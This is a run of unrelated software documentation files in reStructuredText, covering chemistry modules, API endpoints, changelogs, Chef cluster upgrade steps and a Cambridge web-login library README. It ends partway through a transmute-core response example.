.. include:: whats_new/v1.0.1.txt
.. include:: whats_new/v1.0.0.txt
.. include:: whats_new/v0.13.3.txt
.. include:: whats_new/v0.13.2.txt
.. include:: whats_new/v0.13.1.txt
.. include:: whats_new/v0.13.0.txt
.. include:: whats_new/v0.12.2.txt
.. include:: whats_new/v0.12.1.txt
.. include:: whats_new/v0.12.0.txt
.. include:: whats_new/v0.11.3.txt
.. include:: whats_new/v0.11.2.txt
.. include:: whats_new/v0.11.1.txt
.. include:: whats_new/v0.11.0.txt
.. include:: whats_new/v0.10.0.txt
.. include:: whats_new/v0.9.4.txt
.. include:: whats_new/v0.9.3.txt
.. include:: whats_new/v0.9.2.txt
.. include:: whats_new/v0.9.1.txt
.. include:: whats_new/v0.9.0.txt
.. include:: whats_new/v0.8.4.txt
.. include:: whats_new/v0.8.3.txt
.. include:: whats_new/v0.8.2.txt
.. include:: whats_new/v0.8.1.txt
.. include:: whats_new/v0.8.0.txt
.. include:: whats_new/v0.7.0.txt
.. include:: whats_new/v0.6.2.txt
.. include:: whats_new/v0.6.1.txt
.. include:: whats_new/v0.6.0.txt
.. include:: whats_new/v0.5.0.txt
.. include:: whats_new/v0.4.1.txt
.. include:: whats_new/v0.4.0.txt
.. include:: whats_new/v0.3.3.txt
.. include:: whats_new/v0.3.2.txt
.. include:: whats_new/v0.3.1.txt
.. include:: whats_new/v0.3.0.txt
.. include:: whats_new/v0.2.2.txt
.. include:: whats_new/v0.2.1.txt
.. include:: whats_new/v0.2.0.txt
.. include:: whats_new/v0.0.6.txt
psiturk.org RESTful API
========================
The `media` directory
=====================

The `media` directory is a subdirectory of your project directory,
containing symbolic links to various sets of static files which Lino
expects to be served under the `/media/` location.

Lino manages the content of this directory more or less automatically,
but **only if it exists** (and if `www-data` has write permission on
it).

The *development server* will mount it automatically.

On a *production server* you will add a line like the following
to your Apache config::

    Alias /media/ /usr/local/django/myproject/media/

Description of the individual `media` sub-directories:

- /media/lino/ : Lino's :srcref:`/media` directory
- /media/extjs/ : ExtJS library (:attr:`lino.Lino.extjs_root`)
- /media/extensible/ : Ext.ensible library (:attr:`lino.Lino.extensible_root`)
- /media/tinymce/ : TinyMCE library (:attr:`lino.Lino.tinymce_root`)

Lino will automatically create the following subdirectories
if they don't exist:

- /media/cache/ : temporary files created by Lino
- /media/uploads/ : Uploaded files
- /media/webdav/ : User-editable files

There may be application-specific media subdirectories,
for example:

- /media/beid/ : image files for pcsw.models.PersonDetail
*********************************************
Statistical mechanics (:mod:`rmgpy.statmech`)
*********************************************

.. module:: rmgpy.statmech

The :mod:`rmgpy.statmech` subpackage contains classes that represent various
statistical mechanical models of molecular degrees of freedom. These models
enable the computation of macroscopic parameters (e.g. thermodynamics, kinetics,
etc.) from microscopic parameters.

A molecular system consisting of :math:`N` atoms is described by :math:`3N`
molecular degrees of freedom. Three of these modes involve translation of the
system as a whole. Another three of these modes involve rotation of the system
as a whole, unless the system is linear (e.g. diatomics), for which there are
only two rotational modes. The remaining :math:`3N-6` (or :math:`3N-5` if
linear) modes involve internal motion of the atoms within the system. Many of
these modes are well-described as harmonic oscillations, while others are
better modeled as torsional rotations around a bond within the system.

Molecular degrees of freedom are mathematically represented using the
Schrodinger equation :math:`\hat{H} \Psi = E \Psi`. By solving the
Schrodinger equation, we can determine the available energy states of the
molecular system, which enables computation of macroscopic parameters.
Depending on the temperature of interest, some modes (e.g. vibrations) require
a quantum mechanical treatment, while others (e.g. translation, rotation) can
be described using a classical solution.
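
For example, once the energy levels :math:`E_i` and degeneracies :math:`g_i` of a mode
are known, its partition function follows directly as a Boltzmann-weighted sum over
states:

.. math::

    Q(T) = \sum_i g_i e^{-E_i / k_\mathrm{B} T}

The macroscopic quantities computed throughout this module (heat capacity, enthalpy,
entropy, etc.) are standard derivatives of :math:`\ln Q`.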

Translational degrees of freedom
================================

.. currentmodule:: rmgpy.statmech

=============================== ================================================
Class                           Description
=============================== ================================================
:class:`IdealGasTranslation`    A model of three-dimensional translation of an ideal gas
=============================== ================================================
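
As a point of reference, the classical partition function for three-dimensional
translation of an ideal gas particle of mass :math:`m` in a volume :math:`V` is

.. math::

    Q_\mathrm{trans}(T) = \left( \frac{2 \pi m k_\mathrm{B} T}{h^2} \right)^{3/2} V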

Rotational degrees of freedom
=============================

.. currentmodule:: rmgpy.statmech

=========================== ====================================================
Class                       Description
=========================== ====================================================
:class:`LinearRotor`        A model of two-dimensional rigid rotation of a linear molecule
:class:`NonlinearRotor`     A model of three-dimensional rigid rotation of a nonlinear molecule
:class:`KRotor`             A model of one-dimensional rigid rotation of a K-rotor
:class:`SphericalTopRotor`  A model of three-dimensional rigid rotation of a spherical top molecule
=========================== ====================================================

Vibrational degrees of freedom
==============================

.. currentmodule:: rmgpy.statmech

=========================== ====================================================
Class                       Description
=========================== ====================================================
:class:`HarmonicOscillator` A model of a set of one-dimensional harmonic oscillators
=========================== ====================================================
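
For a set of independent harmonic oscillators with frequencies :math:`\nu_i`, with
energies measured relative to the zero-point energy, the partition function is

.. math::

    Q_\mathrm{vib}(T) = \prod_i \frac{1}{1 - e^{-h \nu_i / k_\mathrm{B} T}}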

Torsional degrees of freedom
============================

.. currentmodule:: rmgpy.statmech

=========================== ====================================================
Class                       Description
=========================== ====================================================
:class:`HinderedRotor`      A model of a one-dimensional hindered rotation
=========================== ====================================================

The Schrodinger equation
========================

.. currentmodule:: rmgpy.statmech.schrodinger

=============================== ================================================
Function                        Description
=============================== ================================================
:func:`getPartitionFunction`    Calculate the partition function at a given temperature from energy levels and degeneracies
:func:`getHeatCapacity`         Calculate the dimensionless heat capacity at a given temperature from energy levels and degeneracies
:func:`getEnthalpy`             Calculate the enthalpy at a given temperature from energy levels and degeneracies
:func:`getEntropy`              Calculate the entropy at a given temperature from energy levels and degeneracies
:func:`getSumOfStates`          Calculate the sum of states for a given energy domain from energy levels and degeneracies
:func:`getDensityOfStates`      Calculate the density of states for a given energy domain from energy levels and degeneracies
=============================== ================================================

Convolution
===========

.. currentmodule:: rmgpy.statmech.schrodinger

======================= ========================================================
Function                Description
======================= ========================================================
:func:`convolve`        Return the convolution of two arrays
:func:`convolveBS`      Convolve a degree of freedom into a density or sum of states using the Beyer-Swinehart (BS) direct count algorithm
:func:`convolveBSSR`    Convolve a degree of freedom into a density or sum of states using the Beyer-Swinehart-Stein-Rabinovitch (BSSR) direct count algorithm
======================= ========================================================
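
The direct-count scheme behind :func:`convolveBS` is compact enough to sketch in a few
lines (a simplified illustration on an evenly spaced energy grid, not RMG's optimized
implementation; it assumes each frequency rounds to a whole number of grid points):

```python
def convolve_bs(states, frequencies, d_energy):
    """Convolve harmonic oscillators into a density or sum of states array.

    ``states[i]`` counts states at energy ``i * d_energy``; each oscillator
    of frequency ``nu`` shifts the array by its quantum and adds it onto
    itself (the Beyer-Swinehart direct count).
    """
    result = list(states)
    for nu in frequencies:
        k = int(round(nu / d_energy))   # oscillator quantum in grid points
        for i in range(k, len(result)):
            result[i] += result[i - k]
    return result


# two identical 100 cm^-1 oscillators on a 50 cm^-1 grid give
# 1, 2, 3 states at E = 0, 100, 200 cm^-1
counts = convolve_bs([1, 0, 0, 0, 0], [100.0, 100.0], 50.0)
```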

Molecular conformers
====================

.. currentmodule:: rmgpy.statmech

======================= ========================================================
Class                   Description
======================= ========================================================
:class:`Conformer`      A model of a molecular conformation
======================= ========================================================

.. toctree::
   :hidden:

   idealgastranslation
   linearrotor
   nonlinearrotor
   krotor
   sphericaltoprotor
   harmonicoscillator
   hinderedrotor
   schrodinger
   conformer
Paging data process
==================================

intro
------------

Zhihu has a lot of list-style data: the answers to a question, my followers,
the articles of a column, and so on. The Zhihu API returns such data in
chunks, for example 20 items at a time, which the mobile app presents as
"swipe up to load more". The logic for handling these lists is similar, and
so is the data format; only the objects in the final list items differ.

A typical JSON payload for paged data looks like the following:

.. code-block:: python

    {
        'paging': {
            'previous': 'previous page url',
            'next': 'next page url',
            'is_end': False,  # or True
        },
        'data': [
            {
                'type': 'answer',
                'id': 'xxxx',
                'created_time': '14xxxxx'
                # many attr
            },
            {
                # like last one
            },
            # many many objects
        ],
    }

To keep the code DRY, this logic is abstracted into the :any:`BaseGenerator`
base class; other classes inherit from it to implement the creation of the
different object types.

See :ref:`intro_generator_attr` for how this looks in practice.
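
The paging logic that the base class encapsulates can be sketched as a plain
Python generator (a simplified illustration, not the actual
:any:`BaseGenerator` implementation; ``fetch`` stands in for the authenticated
API call):

```python
from typing import Any, Callable, Dict, Iterator


def iter_paged(fetch: Callable[[str], Dict[str, Any]],
               first_url: str) -> Iterator[dict]:
    """Yield list items page by page until ``paging.is_end`` becomes true."""
    url = first_url
    while True:
        page = fetch(url)               # one API round trip = one JSON page
        for item in page['data']:
            yield item                  # callers consume items lazily
        if page['paging']['is_end']:
            return
        url = page['paging']['next']


# demo with canned pages instead of real API calls
pages = {
    'page1': {'paging': {'next': 'page2', 'is_end': False},
              'data': [{'id': 1}, {'id': 2}]},
    'page2': {'paging': {'next': None, 'is_end': True},
              'data': [{'id': 3}]},
}
items = list(iter_paged(lambda url: pages[url], 'page1'))
```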

Base class
-----------------

.. autoclass:: zhihu_oauth.zhcls.generator.BaseGenerator
    :members:
    :undoc-members:
    :private-members:
    :special-members: __init__, __getitem__, __next__, __iter__

Subclasses
---------------

Only the subclasses of :any:`BaseGenerator` are actually meant to be used.
They override the ``_build_obj`` method; since their structure is otherwise
identical, their detailed documentation is omitted.

.. automodule:: zhihu_oauth.zhcls.generator
    :members:
    :exclude-members: BaseGenerator
    :undoc-members:
    :private-members:
    :special-members: __init__
Usage
=====

.. click:: tengen.__main__:main
   :prog: tengen
   :nested: full
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Changelog for package fog_bumper
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
0.0.1 (2021-11-30)
------------------
* let launch to be executable
* Merge pull request `#1 <https://github.com/tiiuae/fog_bumper/issues/1>`_ from tiiuae/ci-scripts
  Ci scripts
* update versions
* add github action
* Add ci-scripts
* added timer instead of separate thread
* fixed remapping in launch file
* fixed fov of sensors
* update README
* working version of bumper
* first compilable version
* renamed cpp file
* add files, modified Cmakelist and package.xml
* add gitignore
* first commit
* Contributors: Esa Kulmala, Jari Nippula, Vojtech Spurny
.. CDCE9xx documentation master file, created by
   sphinx-quickstart on Fri Feb 11 13:38:35 2022.
   You can adapt this file completely to your liking, but it should at least
   contain the root `toctree` directive.

Welcome to CDCE9xx's documentation!
===================================

**CDCE9xx** is a Python3 command line tool and library for controlling any of the
Texas Instruments CDCE9xx family of programmable spread-spectrum clock generators:

* CDCE(L)913: 1 PLL, 3 Outputs
* CDCE(L)925: 2 PLLs, 5 Outputs
* CDCE(L)937: 3 PLLs, 7 Outputs
* CDCE(L)949: 4 PLLs, 9 Outputs

.. toctree::
   :maxdepth: 2
   :caption: Contents:

   modules

Indices and tables
==================

* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
1.6.5 (11/03/2020)
------------------

- [Bug] :issue:`152`: Remove pkg_info.json file and replace it with python file to avoid access issue at runtime

1.6.4 (08/24/2020)
------------------

- [Bug] :issue:`109`: Fix automated session closure handled by python garbage collection
- [Bug] :issue:`120`: Fix get_remote_session not respecting 'timeout' parameter
- [Bug] :issue:`139`: Fix run_cmd raising AuthenticationException if no agent is running
- [Improvement][Tests]: use flaky package to automatically rerun flaky tests

1.6.3 (03/12/2020)
------------------

- [Improvement]: remove pytest-runner from setup_requires as this is deprecated for security reasons, see https://github.com/pytest-dev/pytest-runner
- [Improvement]: use only fixed test dependencies in requirements_dev.txt

1.6.1 (04/08/2019)
------------------

- [Bug] :issue:`51`: 'get' file was failing if the remote file is binary. Thanks to :user:`pshaobow` for the report.
- [Feature]: Ability to use any parameter of `paramiko.client.SSHClient.connect` in `get_remote_session`, was forgotten during implementation of :issue:`43`.
- [Improvement]: tests migrated to docker-compose to set up the docker environment

1.5.1 (01/14/2019)
------------------

- [Feature] :issue:`43`: Ability to use any parameter of paramiko.client.SSHClient.connect in SSHSession.

1.4.1 (03/31/2018)
------------------

- [Bug] :issue:`33`: Fix download of file owned by root with `SSHSession.get`
- [Bug]: Automatically open closed session when calling SSHSession.put. Thanks to :user:`fmaupas` for the fix.

1.4.0 (01/29/2018)
------------------

- [Feature] :issue:`29`: Expose compression support from Paramiko (inherited from SSH).
  Thanks to :user:`fmaupas` for the contribution.

1.3.2 (12/17/2017)
------------------

- [Bug] :issue:`23`: do not print `byte` but `str` in continuous output when running command with python3.
  Thanks to :user:`nicholasbishop` for the report.

1.3.1 (09/15/2017)
------------------

- fix interruption of remote command when transport channel is already closed

1.3.0 (09/14/2017)
------------------

- allow to conceal part of the command run in logs by specifying a list of patterns in the silent parameter (regexp format).
  For example, if a password is specified in a command you may want to conceal it in logs but still want to log the
  rest of the command run
- ability to customize the success exit code when calling run_cmd so that an exit code different from 0 does not raise
  any exception. The success exit code can be an int or even a list of ints if several exit codes are considered a success.
- ability to retry a remote command until success or until max retry is reached
- ability to forward Ctrl-C to the remote host in order to interrupt the remote command before stopping the local script

1.2.1 (07/27/2017)
------------------

- reduce logging level of some logs
- propagate missing 'silent' parameter in restclient module to run_cmd to control logging

1.2.0 (07/24/2017)
------------------

- automatically open inactive session when running command on it
- automatically open inactive jump session when requesting remote session

1.1.0 (07/20/2017)
------------------

- Each ssh session can be used as a jump server to access multiple remote sessions in parallel. Only 1 remote
  session per jump server was allowed before.
- ability to customize the retry interval when opening a ssh session

1.0.2 (07/14/2017)
------------------

- Fix run of shell builtin commands (source, ...) when impersonating another user, as they cannot be executed
  without the shell and, by default, sudo does not run a shell

1.0.1 (06/11/2017)
------------------

- Fix BadHostKeyException raised by paramiko when reusing the same ssh session object to connect to a different
  remote host having the same IP as the previous host (only the TCP port is different)

1.0.0 (05/24/2017)
------------------

- First release
=====================================================
High Availability: Backend Cluster
=====================================================

`[edit on GitHub] <https://github.com/chef/chef-web-docs/blob/master/chef_master/source/upgrade_server_ha_v2.rst>`__

.. tag chef_automate_mark

.. image:: ../../images/chef_automate_full.png
   :width: 40px
   :height: 17px

.. danger:: This documentation covers an outdated version of Chef Automate. See the `Chef Automate site <https://automate.chef.io/docs/quickstart/>`__ for current documentation. The new Chef Automate includes newer out-of-the-box compliance profiles, an improved compliance scanner with total cloud scanning functionality, better visualizations, role-based access control and many other features.

.. end_tag

This topic describes the process of upgrading a highly available Chef server cluster.

.. note:: .. tag chef_subscriptions

   This feature is included as part of the Chef Automate license agreement and is `available via subscription <https://www.chef.io/pricing/>`_.

   .. end_tag

Overview
=====================================================

These instructions cover the process of upgrading a Chef Backend cluster. Please refer to the appropriate directions for the version of Chef Backend you are using, and the version you intend to upgrade to:

* `Chef Backend 1.x to 2.x Upgrade`_ (downtime upgrade)
* `Chef Backend 1.x to 1.x Upgrade`_ (rolling upgrade)

Chef Backend 1.x to 2.x Upgrade
=====================================================

.. warning:: Upgrading from Chef Backend 1.x to Chef Backend 2.x requires full cluster downtime.

#. Identify the node with the **leader** role using the ``chef-backend-ctl cluster-status`` command:

   .. code-block:: none

      Name       IP              GUID                              Role      PG        ES
      backend-1  192.168.33.215  dc0c6ea77a751f94037cd950e8451fa3  leader    leader    not_master
      backend-2  192.168.33.216  008782c59d3628b6bb7f43556ac0c66c  follower  follower  not_master
      backend-3  192.168.33.217  1af654172b1830927a571d9a5ba7965b  follower  follower  master

   In this example, ``backend-1`` is the **leader** node, as indicated by its role in the **Role** column.

#. Install the new Chef Backend package on all nodes in the cluster:

   * RHEL and CentOS:

     .. code-block:: bash

        yum install PATH_TO_FILE.rpm

   * Debian and Ubuntu:

     .. code-block:: bash

        dpkg -i PATH_TO_FILE.deb

#. On the leader, run the following command to take the node down for the upgrade:

   .. code-block:: bash

      chef-backend-ctl down-for-upgrade

#. Then issue the same command on the follower nodes:

   .. code-block:: bash

      chef-backend-ctl down-for-upgrade

#. Initiate the upgrade on the follower nodes first:

   .. code-block:: bash

      chef-backend-ctl upgrade

#. Then initiate the upgrade on the leader node:

   .. code-block:: bash

      chef-backend-ctl upgrade

#. On any Chef Server frontend nodes using the Chef Backend cluster upgraded in the previous steps, run:

   .. code-block:: bash

      chef-server-ctl reconfigure

#. To continue the upgrades on Chef Server frontends using this backend cluster, see `Upgrade Frontends Associated with a Chef Backend Cluster <https://docs.chef.io/install_server_ha.html#upgrading-chef-server-on-the-frontend-machines>`_

Chef Backend 1.x to 1.x Upgrade
=====================================================
.. note:: The procedure assumes that the new chef-backend package has been copied to all of the nodes.
Step 1: Block Failover
-----------------------------------------------------
We don't want the cluster to fail over to a follower that is in the
process of being upgraded, so we start by disabling failover.
#. Run ``chef-backend-ctl set-cluster-failover off``
Step 2: Upgrade the followers
-----------------------------------------------------
Followers should be upgraded sequentially. Upgrading them simultaneously is not supported and may result in data loss. Verify the successful rejoin after each upgrade.
#. Install the new chef-backend package
* In RedHat/CentOS: ``yum install PATH_TO_RPM``
* In Debian/Ubuntu: ``dpkg -i PATH_TO_DEB``
You may also want to look at the chef-ingredient cookbook to automate
downloading and installing the latest package.
#. Run the upgrade command
.. code-block:: bash
% chef-backend-ctl upgrade
The upgrade command will make any changes necessary to start the new service and verify that the upgraded node has rejoined the cluster.
Repeat the previous steps in this section for each remaining follower.
Step 3: Upgrade the leader
------------------------------------------------------------
#. Unblock failover, trigger failover, block it again.
.. code-block:: bash
% chef-backend-ctl set-cluster-failover on
% chef-backend-ctl upgrade --failover
% chef-backend-ctl set-cluster-failover off
Step 4: Re-enable failover
-----------------------------------------------------
Allow failover again:
.. code-block:: bash
% chef-backend-ctl set-cluster-failover on
Step 5: Verify the cluster is stable
-----------------------------------------------------
Check the status of the cluster:
.. code-block:: bash
% chef-backend-ctl status
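If you script these checks, the leader can be extracted from the tabular ``chef-backend-ctl cluster-status`` output shown earlier. The sketch below is an illustration based on the column layout in the example above, not an official Chef tool:

```python
def find_leader(cluster_status: str) -> str:
    """Return the node name whose Role column reads 'leader'.

    Assumes the whitespace-separated layout shown above:
    Name  IP  GUID  Role  PG  ES
    """
    for line in cluster_status.splitlines():
        fields = line.split()
        # Skip the header row and anything too short to be a node row.
        if len(fields) >= 4 and fields[3] == "leader":
            return fields[0]
    raise ValueError("no leader found in cluster-status output")

# Sample output, copied from the example earlier in this document.
status = """\
Name       IP              GUID                              Role      PG        ES
backend-1  192.168.33.215  dc0c6ea77a751f94037cd950e8451fa3  leader    leader    not_master
backend-2  192.168.33.216  008782c59d3628b6bb7f43556ac0c66c  follower  follower  not_master
backend-3  192.168.33.217  1af654172b1830927a571d9a5ba7965b  follower  follower  master
"""

print(find_leader(status))  # backend-1
```

A wrapper like this can gate an automated upgrade run on the cluster being in the expected state before and after each step.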
samples().annotations()
########################
Returns TCGA annotations about a specific sample. Takes a sample barcode (of length 16, *e.g.* TCGA-01-0628-11A) as a required parameter. The user does not need to be authenticated.
**Example**::
curl https://api-dot-isb-cgc.appspot.com/_ah/api/isb_cgc_tcga_api/v3/samples/TCGA-01-0628-11A/annotations
**API explorer example**:
Click `here <https://apis-explorer.appspot.com/apis-explorer/?base=https://api-dot-isb-cgc.appspot.com/_ah/api#p/isb_cgc_tcga_api/v3/isb_cgc_tcga_api.samples.annotations?sample_barcode=TCGA-01-0628-11A&/>`_ to see this endpoint in Google's API explorer.
**Python API Client Example**::
from googleapiclient.discovery import build
import httplib2
def get_unauthorized_service():
api = 'isb_cgc_tcga_api'
version = 'v3'
site = 'https://api-dot-isb-cgc.appspot.com'
discovery_url = '%s/_ah/api/discovery/v1/apis/%s/%s/rest' % (site, api, version)
return build(api, version, discoveryServiceUrl=discovery_url, http=httplib2.Http())
service = get_unauthorized_service()
data = service.samples().annotations(sample_barcode='TCGA-01-0628-11A').execute()
**Request**
HTTP request::
GET https://api-dot-isb-cgc.appspot.com/_ah/api/isb_cgc_tcga_api/v3/samples/{sample_barcode}/annotations
**Parameters**
.. csv-table::
:header: "**Parameter name**", "**Value**", "**Description**"
:widths: 50, 10, 50
entity_type,string,"Optional. "
sample_barcode,string,"Required. "
**Response**
If successful, this method returns a response body with the following structure:
.. code-block:: javascript
{
"count": integer,
"items": [
{
"aliquot_barcode": string,
"annotation_gdc_id": string,
"annotation_submitter_id": string,
"case_barcode": string,
"case_gdc_id": string,
"category": string,
"classification": string,
"endpoint_type": string,
"entity_barcode": string,
"entity_gdc_id": string,
"entity_type": string,
"notes": string,
"program_name": string,
"project_short_name": string,
"sample_barcode": string,
"status": string
}
]
}
.. csv-table::
:header: "**Parameter name**", "**Value**", "**Description**"
:widths: 50, 10, 50
count, integer, "Number of annotations returned."
items[], list, "List of annotation items."
items[].aliquot_barcode, string, "Aliquot barcode."
items[].annotation_gdc_id, string, "Id assigned by the GDC to the annotation"
items[].annotation_submitter_id, string, "Id assigned to the annotation by the TCGA"
items[].case_barcode, string, "Case barcode."
items[].case_gdc_id, string, "Id assigned by the GDC to the case"
items[].category, string, "Annotation category name, e.g. 'Acceptable treatment for TCGA tumor'."
items[].classification, string, "Annotation classification, e.g. 'CenterNotification', 'Notification', 'Observation', or 'Redaction'."
items[].endpoint_type, string, "Which type of GDC Annotation API was used, either legacy or current "
items[].entity_barcode, string, "The TCGA barcode that the annotation is associated with"
items[].entity_gdc_id, string, "Id assigned by the GDC to the entity"
items[].entity_type, string, "Entity type, e.g. 'Case', 'Aliquot', 'Analyte', 'Portion', 'Slide', or 'Sample'."
items[].notes, string, "Notes on the annotation"
items[].program_name, string, "The program name, e.g. 'TCGA' (the only program with annotations)"
items[].project_short_name, string, "The project id, e.g. 'TCGA-BRCA', 'TCGA-OV'."
items[].sample_barcode, string, "Sample barcode."
items[].status, string, "Status of the annotation, e.g. 'Approved', 'Rescinded'"
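To illustrate how a client might consume this structure, the sketch below tallies annotations by ``classification`` from a response dictionary. The sample data is made up for illustration; the field names follow the table above:

```python
from collections import Counter

def classification_counts(response: dict) -> Counter:
    """Count annotation items by their 'classification' field."""
    return Counter(item.get("classification", "Unknown")
                   for item in response.get("items", []))

# Hypothetical response, shaped like the structure documented above.
response = {
    "count": 3,
    "items": [
        {"sample_barcode": "TCGA-01-0628-11A", "classification": "Notification"},
        {"sample_barcode": "TCGA-01-0628-11A", "classification": "Redaction"},
        {"sample_barcode": "TCGA-01-0628-11A", "classification": "Notification"},
    ],
}

print(classification_counts(response))
# Counter({'Notification': 2, 'Redaction': 1})
```

The same pattern works on the ``data`` dictionary returned by the Python API client example earlier on this page.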
.. The contents of this file may be included in multiple topics (using the includes directive).
.. The contents of this file should be modified in a way that preserves its ability to appear in multiple topics.
Use the following steps to set up a development repository for |chef|:
#. Set up a |github| account.
#. Fork the https://github.com/opscode/chef repository to your |github| account.
#. Clone your fork of the repository:
.. code-block:: bash
$ git clone git@github.com:yourgithubusername/chef.git
#. From the command line, browse to the ``chef/`` directory:
.. code-block:: bash
$ cd chef/
#. From the ``chef/`` directory, add a remote named ``chef``:
.. code-block:: bash
$ git remote add chef git://github.com/chef/chef.git
#. Verify:
.. code-block:: bash
$ git config --get-regexp "^remote\.chef"
which should return something like:
.. code-block:: bash
remote.chef.url git://github.com/chef/chef.git
remote.chef.fetch +refs/heads/*:refs/remotes/chef/*
#. Adjust your branch to track the ``chef`` remote's ``master`` branch:
.. code-block:: bash
$ git config --get-regexp "^branch\.master"
which should return something like:
.. code-block:: bash
branch.master.remote origin
branch.master.merge refs/heads/master
and then change it:
.. code-block:: bash
$ git config branch.master.remote chef
============================================
ucam-wls: a Raven-like login service library
============================================
`Documentation <https://eb677.user.srcf.net/ucam_wls/>`_ [WIP] |
`PyPI <https://pypi.org/project/ucam-wls/>`_ |
`GitHub <https://github.com/edwinbalani/ucam-wls>`_
``ucam-wls`` is a Python library to implement the *web login service* (WLS)
component of the 'Ucam-WebAuth' (or 'WAA2WLS') protocol, which is used
primarily at the University of Cambridge as part of the `Raven authentication
service`_.
-------------------------------------------------------------------------------
Introduction
------------
There are many implementations of the 'web authentication agent' (WAA) part of
Ucam-WebAuth. These are run by the party that is requesting a user's identity,
and they exist already for various platforms, applications and languages.
Examples include:
- the officially-supported `mod_ucam_webauth`_ module for Apache Web Server,
which is very popular (at least within Cambridge University)
- `ucam-webauth-php`_, also published by the University but "not (officially)
supported"
- Daniel Richman's `python-ucam-webauth`_
- `django-ucamwebauth`_, which is written and maintained by a team within the
University
(More are listed on the `Raven project page`_.)
However, no known implementations of the WLS component (which authenticates
users against known credentials) exist, apart from the official Raven
`production`_ and `test/demo`_ servers.
``ucam-wls`` is a first attempt at a solution for developing your own WLS. It
is intended to be easily integrated into a custom or in-house application to
provide the full authentication service.
.. _Ucam-WebAuth: https://raven.cam.ac.uk/project/waa2wls-protocol.txt
.. _Raven authentication service: https://raven.cam.ac.uk/
.. _Raven project page: https://raven.cam.ac.uk/project/
.. _mod_ucam_webauth: https://github.com/cambridgeuniversity/mod_ucam_webauth
.. _ucam-webauth-php: https://github.com/cambridgeuniversity/ucam-webauth-php
.. _python-ucam-webauth: https://github.com/DanielRichman/python-ucam-webauth
.. _django-ucamwebauth: https://github.com/uisautomation/django-ucamwebauth
.. _production: https://raven.cam.ac.uk/
.. _test/demo: https://demo.raven.cam.ac.uk/
Potential applications
----------------------
An **internal single sign-on** service:
- Useful for systems with in-house user account bases: internal webapps avoid
reinventing the wheel by using battle-tested WAA implementations.
- Easier to develop an internal login system in this way: half the work (the
WAA side) is already done.
- Internal webapps no longer need to roll their own authentication
systems/databases, and access to passwords can be kept in a centralised
location.
- *Sounds a lot like the Raven service*, but webapps can authenticate against
an entirely different user database.
**Two-headed** login service:
- Users can authenticate using either locally-administered credentials, or by
being 'referred' to Raven (where the WLS redirects the client browser to
Raven using the same request parameters).
- Integrates authentication of local guest, external or special (e.g.
administrator) accounts with that of mainstream Raven users, creating
a unified login process regardless of the 'source' of the user's identity.
- Similar to local *vs.* Raven login options on many websites and CMSes, but
can be managed institution-wide rather than having to maintain decoupled sets
of passwords on each installation of WordPress, Drupal, *etc.*
The above two use-cases essentially offer the same benefits that Raven does,
but with the added advantage that users don't need a Raven account to benefit
(*e.g.* guests, external researchers, former staff/alumni). Alternatively, if
they do have a Raven account, they can be given the option of using Raven or
local credentials.
The next use-case is different...
**Stricter authentication requirements** than what Raven provides:
- Useful for sensitive applications
- Require both a username/password (possibly from either Raven or local
credentials; see above) as well as multi-factor authentication methods such
as a one-time password (OTP).
- OTP secrets can be kept and managed centrally; the webapp never sees them or
the OTP responses.
Example WLS implementation
--------------------------
A simple implementation of a WLS using this library, and similar in nature to
the `Raven demo server`_, is available in the `wls-demo`_ repository.
.. _Raven demo server: https://demo.raven.cam.ac.uk/
.. _wls-demo: https://github.com/edwinbalani/wls-demo
Contributing
------------
There is a long **to-do list** on this project. It includes:
* Writing unit tests
* Improving API documentation
If you are keen to help out on any of the above (or indeed anything else), then
please fork, commit and submit a pull request! Maybe `get in touch
<mailto:git+ucam-wls@balani.xyz>`_ too :)
A warning
---------
``ucam-wls`` is currently **alpha quality software**. It has not been tested
heavily (yet), so no guarantees can be made regarding its security or
robustness.
For example, while the library attempts to make *some* checks on input
arguments (regarding types, values, validity *etc.*), it is still definitely
possible to produce bogus responses that will confuse WAAs. (However,
``ucam-wls`` is a library, and there is some level of expectation that
application developers will interface with it properly!)
What this library does and doesn't do
-------------------------------------
``ucam-wls`` is a *library*, not a complete solution. Accordingly, it will:
* Provide a high-level interface to a protocol-compliant implementation of a
WLS.
* Accept authentication requests as URL query strings, a Python dictionary of
parameters, or as keyword arguments to a class constructor function.
* Generate signed authentication responses with the appropriate status code,
using a provided RSA private key.
But ``ucam-wls`` won't:
* Run a fully-blown authentication server that checks usernames/passwords.
* Serve a web interface for users to authenticate. (See `wls-demo`_ for an
example of this.)
* Manage your RSA private keys for you.
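For a rough idea of what "accept authentication requests as URL query strings" involves, the sketch below parses the query component of a WAA2WLS authentication request into a parameter dictionary using only the standard library. It illustrates the protocol's request format; it is not ucam-wls's actual API, and the function name here is invented for the example:

```python
from urllib.parse import parse_qs, urlsplit

def parse_wls_request(request_url: str) -> dict:
    """Extract single-valued WLS request parameters from a full URL.

    'ver' and 'url' are treated as required here; the remaining
    parameters defined by the protocol (desc, aauth, iact, msg,
    params, date, fail) are optional.
    """
    query = urlsplit(request_url).query
    # parse_qs returns lists; WLS parameters are single-valued.
    params = {k: v[0] for k, v in parse_qs(query).items()}
    for required in ("ver", "url"):
        if required not in params:
            raise ValueError(f"missing required WLS parameter: {required}")
    return params

req = ("https://auth.example.org/wls/authenticate"
       "?ver=3&url=https%3A%2F%2Fwww.example.org%2F&desc=Example%20site&iact=yes")
params = parse_wls_request(req)
print(params["ver"], params["desc"])  # 3 Example site
```

A real WLS would go on to authenticate the user and build a signed response, which is the part this library provides.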
Links
-----
- `WAA2WLS protocol definition <https://github.com/cambridgeuniversity/UcamWebauth-protocol/blob/master/waa2wls-protocol.txt>`_
- `Raven project pages <https://raven.cam.ac.uk/project/>`_
- `Raven wiki <https://wiki.cam.ac.uk/raven/>`_. Contains lots of newer
information on Raven support, WAA implementations, *etc.*
Credits and copyright
---------------------
``ucam-wls`` is authored by `Edwin Balani <https://github.com/edwinbalani/>`_,
and released under the terms of the MIT License.
The Ucam-WebAuth/WAA2WLS protocol was designed by `Jon Warbrick
<http://people.ds.cam.ac.uk/jw35/>`_.
========
Response
========
--------------
Response Shape
--------------
The response shape describes what sort of object is returned back by the HTTP
response in cases of success.
Simple Shape
============
As of transmute-core 0.4.0, the default response shape is simply the
object itself, serialized to the primitive content type. e.g.
.. code-block:: python
from transmute_core import annotate
from schematics.models import Model
from schematics.types import StringType, IntType
class MyModel(Model):
foo = StringType()
bar = IntType()
@annotate({"return": MyModel})
def return_mymodel():
return MyModel({
"foo": "foo",
"bar": 3
})
This would return the response:
.. code-block:: json
{
